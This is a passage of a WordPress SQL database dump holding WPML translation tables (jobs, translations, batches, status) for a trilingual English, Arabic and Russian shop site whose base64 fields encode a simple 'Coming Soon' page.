(72, 3, 0, '2022-10-30 06:56:55', 'excerpt', '', 'base64', 1, '', '', 1),
(75, 4, 0, '2022-10-30 06:58:01', 'original_id', '', '', 0, '351', '357', 1),
(76, 4, 0, '2022-10-30 06:58:01', 'title', '', 'base64', 1, 'Y29taW5nIHNvb24=', 'Y29taW5nIHNvb24=', 1),
(77, 4, 0, '2022-10-30 06:58:01', 'body', '', 'base64', 1, 'PGgxPjwvaDE+DQo8aDE+PC9oMT4NCjxoMSBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+Q29taW5nIFNvb248L2gxPg0KPGgyIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5UaGFuayB5b3UgZm9yIHlvdXIgcGF0aWVuY2UuPC9oMj4NCiZuYnNwOw0KDQombmJzcDsNCg0KJm5ic3A7DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPkFyaXMsIE5hdHVyYWwgVGFzdGU8L2gyPg==', 'PGgxPjwvaDE+DQo8aDE+PC9oMT4NCjxoMSBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+Q29taW5nIFNvb248L2gxPg0KPGgyIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij5UaGFuayB5b3UgZm9yIHlvdXIgcGF0aWVuY2UuPC9oMj4NCiZuYnNwOw0KDQombmJzcDsNCg0KJm5ic3A7DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPkFyaXMsIE5hdHVyYWwgVGFzdGU8L2gyPg==', 1),
(78, 4, 0, '2022-10-30 06:58:01', 'excerpt', '', 'base64', 1, '', '', 1);

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_translate_job`
--

CREATE TABLE `wp_icl_translate_job` (
  `job_id` bigint(20) UNSIGNED NOT NULL,
  `rid` bigint(20) UNSIGNED NOT NULL,
  `translator_id` int(10) UNSIGNED NOT NULL,
  `translated` tinyint(3) UNSIGNED NOT NULL DEFAULT 0,
  `manager_id` int(10) UNSIGNED NOT NULL,
  `revision` int(10) UNSIGNED DEFAULT NULL,
  `title` varchar(160) DEFAULT NULL,
  `deadline_date` datetime DEFAULT NULL,
  `completed_date` datetime DEFAULT NULL,
  `editor` varchar(16) DEFAULT NULL,
  `editor_job_id` bigint(20) UNSIGNED DEFAULT NULL,
  `edit_timestamp` int(11) UNSIGNED DEFAULT NULL,
  `automatic` tinyint(3) UNSIGNED NOT NULL DEFAULT 0,
  `ate_sync_count` int(6) UNSIGNED DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_translate_job`
--

INSERT INTO `wp_icl_translate_job` (`job_id`, `rid`, `translator_id`, `translated`, `manager_id`, `revision`, `title`, `deadline_date`, `completed_date`, `editor`, `editor_job_id`, `edit_timestamp`, `automatic`, `ate_sync_count`) VALUES
(1, 71, 1, 1, 1, NULL, 'Home', NULL, NULL, 'wp', NULL, NULL, 0, 0),
(2, 72, 1, 1, 1, NULL, 'Home', NULL, NULL, 'wp', NULL, NULL, 0, 0),
(3, 143, 1, 1, 1, NULL, 'coming soon', NULL, NULL, 'wp', NULL, NULL, 0, 0),
(4, 144, 1, 1, 1, NULL, 'coming soon', NULL, NULL, 'wp', NULL, NULL, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_translations`
--

CREATE TABLE `wp_icl_translations` (
  `translation_id` bigint(20) NOT NULL,
  `element_type` varchar(60) NOT NULL DEFAULT 'post_post',
  `element_id` bigint(20) DEFAULT NULL,
  `trid` bigint(20) NOT NULL,
  `language_code` varchar(7) NOT NULL,
  `source_language_code` varchar(7) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_translations`
--

INSERT INTO `wp_icl_translations` (`translation_id`, `element_type`, `element_id`, `trid`, `language_code`, `source_language_code`) VALUES
(1, 'post_page', 3, 3, 'en', NULL),
(2, 'post_page', 11, 11, 'en', NULL),
(3, 'post_page', 2, 2, 'en', NULL),
(4, 'post_page', 7, 7, 'en', NULL),
(5, 'post_page', 8, 8, 'en', NULL),
(6, 'post_page', 9, 9, 'en', NULL),
(7, 'post_page', 10, 10, 'en', NULL),
(8, 'post_page', 14, 14, 'en', NULL),
(9, 'post_post', 1, 1, 'en', NULL),
(10, 'post_wp_global_styles', 13, 13, 'en', NULL),
(11, 'post_wpcf7_contact_form', 5, 5, 'en', NULL),
(16, 'tax_category', 1, 16, 'en', NULL),
(17, 'tax_wp_theme', 16, 33, 'en', NULL),
(25, 'tax_product_visibility', 6, 46, 'en', NULL),
(26, 'tax_product_visibility', 7, 47, 'en', NULL),
(27, 'tax_product_visibility', 8, 48, 'en', NULL),
(28, 'tax_product_visibility', 9, 49, 'en', NULL),
(29, 'tax_product_visibility', 10, 50, 'en', NULL),
(30, 'tax_product_visibility', 11, 51, 'en', NULL),
(31, 'tax_product_visibility', 12, 52, 'en', NULL),
(32, 'tax_product_visibility', 13, 53, 'en', NULL),
(33, 'tax_product_visibility', 14, 54, 'en', NULL),
(40, 'tax_product_cat', 15, 70, 'en', NULL),
(41, 'comment', 1, 72, 'en', NULL),
(42, 'tax_category', 17, 16, 'ar', 'en'),
(43, 'tax_category', 18, 16, 'ru', 'en'),
(45, 'package_block', 1, 73, 'en', NULL),
(46, 'post_attachment', 6, 80, 'en', NULL),
(48, 'tax_translation_priority', 19, 81, 'en', NULL),
(49, 'tax_translation_priority', 20, 81, 'ar', 'en'),
(50, 'tax_translation_priority', 21, 81, 'ru', 'en'),
(52, 'tax_translation_priority', 22, 82, 'en', NULL),
(53, 'tax_translation_priority', 23, 82, 'ar', 'en'),
(54, 'tax_translation_priority', 24, 82, 'ru', 'en'),
(56, 'tax_translation_priority', 25, 83, 'en', NULL),
(57, 'tax_translation_priority', 26, 83, 'ar', 'en'),
(58, 'tax_translation_priority', 27, 83, 'ru', 'en'),
(59, 'post_attachment', 18, 80, 'ar', 'en'),
(60, 'post_attachment', 19, 80, 'ru', 'en'),
(61, 'post_attachment', 20, 84, 'en', NULL),
(62, 'post_attachment', 21, 84, 'ar', 'en'),
(63, 'post_attachment', 22, 84, 'ru', 'en'),
(64, 'tax_nav_menu', 28, 85, 'en', NULL),
(66, 'post_nav_menu_item', 24, 87, 'en', NULL),
(67, 'post_nav_menu_item', 25, 88, 'en', NULL),
(68, 'post_nav_menu_item', 26, 89, 'en', NULL),
(69, 'post_nav_menu_item', 27, 90, 'en', NULL),
(70, 'post_nav_menu_item', 28, 91, 'en', NULL),
(71, 'post_nav_menu_item', 29, 92, 'en', NULL),
(72, 'post_attachment', 30, 93, 'en', NULL),
(73, 'post_attachment', 31, 93, 'ar', 'en'),
(74, 'post_attachment', 32, 93, 'ru', 'en'),
(75, 'post_attachment', 33, 94, 'en', NULL),
(76, 'post_attachment', 34, 94, 'ar', 'en'),
(77, 'post_attachment', 35, 94, 'ru', 'en'),
(79, 'package_page-builder-shortcode-strings', 2, 95, 'en', NULL),
(80, 'post_attachment', 40, 96, 'en', NULL),
(81, 'post_attachment', 41, 96, 'ar', 'en'),
(82, 'post_attachment', 42, 96, 'ru', 'en'),
(83, 'post_nav_menu_item', 43, 97, 'en', NULL),
(84, 'post_attachment', 48, 98, 'en', NULL),
(85, 'post_attachment', 49, 98, 'ar', 'en'),
(86, 'post_attachment', 50, 98, 'ru', 'en'),
(87, 'post_attachment', 51, 99, 'en', NULL),
(88, 'post_attachment', 52, 99, 'ar', 'en'),
(89, 'post_attachment', 53, 99, 'ru', 'en'),
(90, 'post_attachment', 54, 100, 'en', NULL),
(91, 'post_attachment', 55, 100, 'ar', 'en'),
(92, 'post_attachment', 56, 100, 'ru', 'en'),
(93, 'post_attachment', 57, 101, 'en', NULL),
(94, 'post_attachment', 58, 101, 'ar', 'en'),
(95, 'post_attachment', 59, 101, 'ru', 'en'),
(96, 'tax_product_cat', 29, 102, 'en', NULL),
(97, 'tax_product_cat', 30, 103, 'en', NULL),
(98, 'tax_product_cat', 31, 104, 'en', NULL),
(99, 'tax_product_cat', 32, 105, 'en', NULL),
(100, 'post_attachment', 66, 106, 'en', NULL),
(101, 'post_attachment', 67, 106, 'ar', 'en'),
(102, 'post_attachment', 68, 106, 'ru', 'en'),
(103, 'post_attachment', 74, 107, 'en', NULL),
(104, 'post_attachment', 75, 107, 'ar', 'en'),
(105, 'post_attachment', 76, 107, 'ru', 'en'),
(106, 'post_attachment', 83, 108, 'en', NULL),
(107, 'post_attachment', 84, 108, 'ar', 'en'),
(108, 'post_attachment', 85, 108, 'ru', 'en'),
(109, 'post_attachment', 86, 109, 'en', NULL),
(110, 'post_attachment', 87, 109, 'ar', 'en'),
(111, 'post_attachment', 88, 109, 'ru', 'en'),
(112, 'post_attachment', 89, 110, 'en', NULL),
(113, 'post_attachment', 90, 110, 'ar', 'en'),
(114, 'post_attachment', 91, 110, 'ru', 'en'),
(115, 'post_attachment', 92, 111, 'en', NULL),
(116, 'post_attachment', 93, 111, 'ar', 'en'),
(117, 'post_attachment', 94, 111, 'ru', 'en'),
(118, 'post_attachment', 95, 112, 'en', NULL),
(119, 'post_attachment', 96, 112, 'ar', 'en'),
(120, 'post_attachment', 97, 112, 'ru', 'en'),
(121, 'post_attachment', 98, 113, 'en', NULL),
(122, 'post_attachment', 99, 113, 'ar', 'en'),
(123, 'post_attachment', 100, 113, 'ru', 'en'),
(124, 'post_page', 108, 114, 'en', NULL),
(126, 'package_page-builder-shortcode-strings', 3, 115, 'en', NULL),
(127, 'post_attachment', 113, 116, 'en', NULL),
(128, 'post_attachment', 114, 116, 'ar', 'en'),
(129, 'post_attachment', 115, 116, 'ru', 'en'),
(130, 'post_attachment', 116, 117, 'en', NULL),
(131, 'post_attachment', 117, 117, 'ar', 'en'),
(132, 'post_attachment', 118, 117, 'ru', 'en'),
(133, 'post_attachment', 119, 118, 'en', NULL),
(134, 'post_attachment', 120, 118, 'ar', 'en'),
(135, 'post_attachment', 121, 118, 'ru', 'en'),
(136, 'post_attachment', 122, 119, 'en', NULL),
(137, 'post_attachment', 123, 119, 'ar', 'en'),
(138, 'post_attachment', 124, 119, 'ru', 'en'),
(139, 'post_attachment', 125, 120, 'en', NULL),
(140, 'post_attachment', 126, 120, 'ar', 'en'),
(141, 'post_attachment', 127, 120, 'ru', 'en'),
(142, 'post_attachment', 128, 121, 'en', NULL),
(143, 'post_attachment', 129, 121, 'ar', 'en'),
(144, 'post_attachment', 130, 121, 'ru', 'en'),
(145, 'post_attachment', 131, 122, 'en', NULL),
(146, 'post_attachment', 132, 122, 'ar', 'en'),
(147, 'post_attachment', 133, 122, 'ru', 'en'),
(148, 'post_attachment', 134, 123, 'en', NULL),
(149, 'post_attachment', 135, 123, 'ar', 'en'),
(150, 'post_attachment', 136, 123, 'ru', 'en'),
(151, 'post_attachment', 137, 124, 'en', NULL),
(152, 'post_attachment', 138, 124, 'ar', 'en'),
(153, 'post_attachment', 139, 124, 'ru', 'en'),
(154, 'post_attachment', 140, 125, 'en', NULL),
(155, 'post_attachment', 141, 125, 'ar', 'en'),
(156, 'post_attachment', 142, 125, 'ru', 'en'),
(157, 'post_attachment', 150, 126, 'en', NULL),
(158, 'post_attachment', 151, 126, 'ar', 'en'),
(159, 'post_attachment', 152, 126, 'ru', 'en'),
(160, 'post_attachment', 153, 127, 'en', NULL),
(161, 'post_attachment', 154, 127, 'ar', 'en'),
(162, 'post_attachment', 155, 127, 'ru', 'en'),
(163, 'post_attachment', 156, 128, 'en', NULL),
(164, 'post_attachment', 157, 128, 'ar', 'en'),
(165, 'post_attachment', 158, 128, 'ru', 'en'),
(166, 'post_attachment', 159, 129, 'en', NULL),
(167, 'post_attachment', 160, 129, 'ar', 'en'),
(168, 'post_attachment', 161, 129, 'ru', 'en'),
(169, 'post_attachment', 162, 130, 'en', NULL),
(170, 'post_attachment', 163, 130, 'ar', 'en'),
(171, 'post_attachment', 164, 130, 'ru', 'en'),
(172, 'post_attachment', 165, 131, 'en', NULL),
(173, 'post_attachment', 166, 131, 'ar', 'en'),
(174, 'post_attachment', 167, 131, 'ru', 'en'),
(175, 'post_attachment', 168, 132, 'en', NULL),
(176, 'post_attachment', 169, 132, 'ar', 'en'),
(177, 'post_attachment', 170, 132, 'ru', 'en'),
(178, 'post_attachment', 172, 133, 'en', NULL),
(179, 'post_attachment', 173, 133, 'ar', 'en'),
(180, 'post_attachment', 174, 133, 'ru', 'en'),
(181, 'tax_nav_menu', 33, 134, 'en', NULL),
(182, 'post_nav_menu_item', 175, 135, 'en', NULL),
(183, 'post_nav_menu_item', 176, 136, 'en', NULL),
(184, 'post_nav_menu_item', 177, 137, 'en', NULL),
(185, 'post_nav_menu_item', 178, 138, 'en', NULL),
(186, 'tax_nav_menu', 34, 85, 'ar', 'en'),
(187, 'post_nav_menu_item', 179, 139, 'ar', NULL),
(188, 'post_nav_menu_item', 180, 140, 'ar', NULL),
(189, 'post_nav_menu_item', 181, 141, 'ar', NULL),
(190, 'post_nav_menu_item', 182, 142, 'ar', NULL),
(191, 'post_nav_menu_item', 183, 143, 'ar', NULL),
(192, 'post_nav_menu_item', 184, 144, 'ar', NULL),
(193, 'post_nav_menu_item', 185, 145, 'ar', NULL),
(194, 'post_page', 186, 14, 'ar', 'en'),
(195, 'tax_nav_menu', 35, 134, 'ar', 'en'),
(196, 'post_nav_menu_item', 201, 146, 'ar', NULL),
(197, 'post_nav_menu_item', 202, 147, 'ar', NULL),
(198, 'post_nav_menu_item', 203, 148, 'ar', NULL),
(199, 'post_nav_menu_item', 204, 149, 'ar', NULL),
(200, 'post_page', 205, 14, 'ru', 'en'),
(201, 'tax_nav_menu', 36, 85, 'ru', 'en'),
(202, 'post_nav_menu_item', 214, 150, 'ru', NULL),
(203, 'post_nav_menu_item', 215, 151, 'ru', NULL),
(204, 'post_nav_menu_item', 216, 152, 'ru', NULL),
(205, 'post_nav_menu_item', 217, 153, 'ru', NULL),
(206, 'post_nav_menu_item', 218, 154, 'ru', NULL),
(207, 'post_nav_menu_item', 219, 155, 'ru', NULL),
(208, 'post_nav_menu_item', 220, 156, 'ru', NULL),
(209, 'tax_nav_menu', 37, 134, 'ru', 'en'),
(210, 'post_nav_menu_item', 221, 157, 'ru', NULL),
(211, 'post_nav_menu_item', 222, 158, 'ru', NULL),
(212, 'post_nav_menu_item', 223, 159, 'ru', NULL),
(213, 'post_nav_menu_item', 224, 160, 'ru', NULL),
(214, 'post_attachment', 226, 161, 'ar', NULL),
(215, 'post_attachment', 227, 161, 'en', 'ar'),
(216, 'post_attachment', 228, 161, 'ru', 'ar'),
(217, 'post_attachment', 229, 162, 'ar', NULL),
(218, 'post_attachment', 230, 162, 'en', 'ar'),
(219, 'post_attachment', 231, 162, 'ru', 'ar'),
(220, 'post_attachment', 232, 163, 'ar', NULL),
(221, 'post_attachment', 233, 163, 'en', 'ar'),
(222, 'post_attachment', 234, 163, 'ru', 'ar'),
(223, 'post_attachment', 235, 164, 'en', NULL),
(224, 'post_attachment', 236, 164, 'ar', 'en'),
(225, 'post_attachment', 237, 164, 'ru', 'en'),
(226, 'post_attachment', 238, 165, 'en', NULL),
(227, 'post_attachment', 239, 165, 'ar', 'en'),
(228, 'post_attachment', 240, 165, 'ru', 'en'),
(229, 'post_attachment', 241, 166, 'en', NULL),
(230, 'post_attachment', 242, 166, 'ar', 'en'),
(231, 'post_attachment', 243, 166, 'ru', 'en'),
(232, 'post_attachment', 244, 167, 'en', NULL),
(233, 'post_attachment', 245, 167, 'ar', 'en'),
(234, 'post_attachment', 246, 167, 'ru', 'en'),
(235, 'post_attachment', 247, 168, 'en', NULL),
(236, 'post_attachment', 248, 168, 'ar', 'en'),
(237, 'post_attachment', 249, 168, 'ru', 'en'),
(238, 'post_attachment', 250, 169, 'en', NULL),
(239, 'post_attachment', 251, 169, 'ar', 'en'),
(240, 'post_attachment', 252, 169, 'ru', 'en'),
(241, 'post_attachment', 253, 170, 'en', NULL),
(242, 'post_attachment', 254, 170, 'ar', 'en'),
(243, 'post_attachment', 255, 170, 'ru', 'en'),
(244, 'post_attachment', 256, 171, 'en', NULL),
(245, 'post_attachment', 257, 171, 'ar', 'en'),
(246, 'post_attachment', 258, 171, 'ru', 'en'),
(247, 'post_attachment', 259, 172, 'en', NULL),
(248, 'post_attachment', 260, 172, 'ar', 'en'),
(249, 'post_attachment', 261, 172, 'ru', 'en'),
(250, 'post_attachment', 262, 173, 'en', NULL),
(251, 'post_attachment', 263, 173, 'ar', 'en'),
(252, 'post_attachment', 264, 173, 'ru', 'en'),
(254, 'post_attachment', 267, 174, 'ar', NULL),
(255, 'post_attachment', 268, 174, 'ru', 'ar'),
(257, 'post_attachment', 271, 175, 'ar', NULL),
(258, 'post_attachment', 272, 175, 'ru', 'ar'),
(260, 'post_attachment', 274, 176, 'ar', NULL),
(261, 'post_attachment', 275, 176, 'ru', 'ar'),
(263, 'post_attachment', 277, 177, 'ar', NULL),
(264, 'post_attachment', 278, 177, 'ru', 'ar'),
(266, 'post_attachment', 280, 178, 'ar', NULL),
(267, 'post_attachment', 281, 178, 'ru', 'ar'),
(268, 'post_attachment', 282, 179, 'en', NULL),
(269, 'post_attachment', 283, 179, 'ar', 'en'),
(270, 'post_attachment', 284, 179, 'ru', 'en'),
(271, 'post_attachment', 285, 180, 'en', NULL),
(272, 'post_attachment', 286, 180, 'ar', 'en'),
(273, 'post_attachment', 287, 180, 'ru', 'en'),
(274, 'post_attachment', 288, 181, 'en', NULL),
(275, 'post_attachment', 289, 181, 'ar', 'en'),
(276, 'post_attachment', 290, 181, 'ru', 'en'),
(277, 'post_attachment', 292, 182, 'en', NULL),
(278, 'post_attachment', 293, 182, 'ar', 'en'),
(279, 'post_attachment', 294, 182, 'ru', 'en'),
(280, 'post_attachment', 295, 183, 'en', NULL),
(281, 'post_attachment', 296, 183, 'ar', 'en'),
(282, 'post_attachment', 297, 183, 'ru', 'en'),
(283, 'post_attachment', 298, 184, 'en', NULL),
(284, 'post_attachment', 299, 184, 'ar', 'en'),
(285, 'post_attachment', 300, 184, 'ru', 'en'),
(286, 'post_attachment', 301, 185, 'en', NULL),
(287, 'post_attachment', 302, 185, 'ar', 'en'),
(288, 'post_attachment', 303, 185, 'ru', 'en'),
(289, 'post_attachment', 305, 186, 'en', NULL),
(290, 'post_attachment', 306, 186, 'ar', 'en'),
(291, 'post_attachment', 307, 186, 'ru', 'en'),
(293, 'post_attachment', 310, 187, 'ar', NULL),
(294, 'post_attachment', 311, 187, 'ru', 'ar'),
(295, 'post_attachment', 313, 188, 'en', NULL),
(296, 'post_attachment', 314, 188, 'ar', 'en'),
(297, 'post_attachment', 315, 188, 'ru', 'en'),
(298, 'post_attachment', 319, 189, 'en', NULL),
(299, 'post_attachment', 320, 189, 'ar', 'en'),
(300, 'post_attachment', 321, 189, 'ru', 'en'),
(301, 'post_attachment', 322, 190, 'en', NULL),
(302, 'post_attachment', 323, 190, 'ar', 'en'),
(303, 'post_attachment', 324, 190, 'ru', 'en'),
(304, 'post_attachment', 327, 191, 'en', NULL),
(305, 'post_attachment', 328, 191, 'ar', 'en'),
(306, 'post_attachment', 329, 191, 'ru', 'en'),
(307, 'post_attachment', 330, 192, 'en', NULL),
(308, 'post_attachment', 331, 192, 'ar', 'en'),
(309, 'post_attachment', 332, 192, 'ru', 'en'),
(310, 'tax_product_cat', 38, 103, 'ar', 'en'),
(311, 'tax_product_cat', 39, 105, 'ar', 'en'),
(312, 'tax_product_cat', 40, 104, 'ar', 'en'),
(313, 'tax_product_cat', 41, 102, 'ar', 'en'),
(314, 'tax_product_cat', 42, 103, 'ru', 'en'),
(315, 'tax_product_cat', 43, 105, 'ru', 'en'),
(316, 'tax_product_cat', 44, 104, 'ru', 'en'),
(317, 'tax_product_cat', 45, 102, 'ru', 'en'),
(318, 'post_attachment', 342, 193, 'en', NULL),
(319, 'post_attachment', 343, 193, 'ar', 'en'),
(320, 'post_attachment', 344, 193, 'ru', 'en'),
(321, 'post_attachment', 345, 194, 'en', NULL),
(322, 'post_attachment', 346, 194, 'ar', 'en'),
(323, 'post_attachment', 347, 194, 'ru', 'en'),
(324, 'post_attachment', 348, 195, 'en', NULL),
(325, 'post_attachment', 349, 195, 'ar', 'en'),
(326, 'post_attachment', 350, 195, 'ru', 'en'),
(327, 'post_page', 351, 196, 'en', NULL),
(328, 'post_page', 355, 196, 'ar', 'en'),
(329, 'post_page', 357, 196, 'ru', 'en');

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_translation_batches`
--

CREATE TABLE `wp_icl_translation_batches` (
  `id` int(11) NOT NULL,
  `batch_name` text NOT NULL,
  `tp_id` int(11) DEFAULT NULL,
  `ts_url` text DEFAULT NULL,
  `last_update` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_translation_batches`
--

INSERT INTO `wp_icl_translation_batches` (`id`, `batch_name`, `tp_id`, `ts_url`, `last_update`) VALUES
(1, 'Manual Translations from October the 23rd, 2022', NULL, NULL, '2022-10-23 05:26:13'),
(2, 'Manual Translations from October the 30th, 2022', NULL, NULL, '2022-10-30 06:56:55');

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_translation_downloads`
--

CREATE TABLE `wp_icl_translation_downloads` (
  `editor_job_id` bigint(20) UNSIGNED NOT NULL,
  `download_url` varchar(2000) NOT NULL,
  `lock_timestamp` int(11) UNSIGNED DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wp_icl_translation_status`
--

CREATE TABLE `wp_icl_translation_status` (
  `rid` bigint(20) NOT NULL,
  `translation_id` bigint(20) NOT NULL,
  `status` tinyint(4) NOT NULL,
  `translator_id` bigint(20) NOT NULL,
  `needs_update` tinyint(4) NOT NULL,
  `md5` varchar(32) NOT NULL,
  `translation_service` varchar(16) NOT NULL,
  `batch_id` int(11) NOT NULL DEFAULT 0,
  `translation_package` longtext NOT NULL,
  `timestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  `links_fixed` tinyint(4) NOT NULL DEFAULT 0,
  `_prevstate` longtext DEFAULT NULL,
  `uuid` varchar(36) DEFAULT NULL,
  `tp_id` int(11) DEFAULT NULL,
  `tp_revision` int(11) NOT NULL DEFAULT 1,
  `ts_status` text DEFAULT NULL,
  `review_status` enum('NEEDS_REVIEW','EDITING','ACCEPTED') DEFAULT NULL,
  `ate_comm_retry_count` int(11) UNSIGNED DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wp_icl_translation_status`
--

INSERT INTO `wp_icl_translation_status` (`rid`, `translation_id`, `status`, `translator_id`, `needs_update`, `md5`, `translation_service`, `batch_id`, `translation_package`, `timestamp`, `links_fixed`, `_prevstate`, `uuid`, `tp_id`, `tp_revision`, `ts_status`, `review_status`, `ate_comm_retry_count`) VALUES
(1, 59, 9, 0, 0, '', '', 0, '', '2022-10-19 07:12:53', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(2, 60, 9, 0, 0, '', '', 0, '', '2022-10-19 07:12:53', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(3, 62, 9, 0, 0, '', '', 0, '', '2022-10-19 07:42:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(4, 63, 9, 0, 0, '', '', 0, '', '2022-10-19 07:42:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(5, 73, 9, 0, 0, '', '', 0, '', '2022-10-19 07:55:08', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(6, 74, 9, 0, 0, '', '', 0, '', '2022-10-19 07:55:08', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(7, 76, 9, 0, 0, '', '', 0, '', '2022-10-19 07:55:09', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(8, 77, 9, 0, 0, '', '', 0, '', '2022-10-19 07:55:09', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(9, 81, 9, 0, 0, '', '', 0, '', '2022-10-19 09:04:21', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(10, 82, 9, 0, 0, '', '', 0, '', '2022-10-19 09:04:21', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(11, 85, 9, 0, 0, '', '', 0, '', '2022-10-20 06:33:30', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(12, 86, 9, 0, 0, '', '', 0, '', '2022-10-20 06:33:30', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(13, 88, 9, 0, 0, '', '', 0, '', '2022-10-20 06:33:40', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(14, 89, 9, 0, 0, '', '', 0, '', '2022-10-20 06:33:40', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(15, 91, 9, 0, 0, '', '', 0, '', '2022-10-20 06:33:51', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(16, 92, 9, 0, 0, '', '', 0, '', '2022-10-20 06:33:51', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(17, 94, 9, 0, 0, '', '', 0, '', '2022-10-20 06:34:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(18, 95, 9, 0, 0, '', '', 0, '', '2022-10-20 06:34:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(19, 101, 9, 0, 0, '', '', 0, '', '2022-10-20 07:09:26', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(20, 102, 9, 0, 0, '', '', 0, '', '2022-10-20 07:09:26', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(21, 104, 9, 0, 0, '', '', 0, '', '2022-10-20 08:57:17', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(22, 105, 9, 0, 0, '', '', 0, '', '2022-10-20 08:57:17', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(23, 107, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:00', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(24, 108, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:00', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(25, 110, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:12', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(26, 111, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:12', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(27, 113, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:23', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(28, 114, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:23', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(29, 116, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:34', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(30, 117, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:34', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(31, 119, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:44', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(32, 120, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:44', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(33, 122, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:55', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(34, 123, 9, 0, 0, '', '', 0, '', '2022-10-20 09:25:55', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(35, 128, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:03', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(36, 129, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:03', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(37, 131, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:14', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(38, 132, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:14', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(39, 134, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:24', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(40, 135, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:24', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(41, 137, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:35', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(42, 138, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:35', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(43, 140, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:46', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(44, 141, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:46', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(45, 143, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:56', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(46, 144, 9, 0, 0, '', '', 0, '', '2022-10-22 06:15:56', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(47, 146, 9, 0, 0, '', '', 0, '', '2022-10-22 06:16:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(48, 147, 9, 0, 0, '', '', 0, '', '2022-10-22 06:16:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
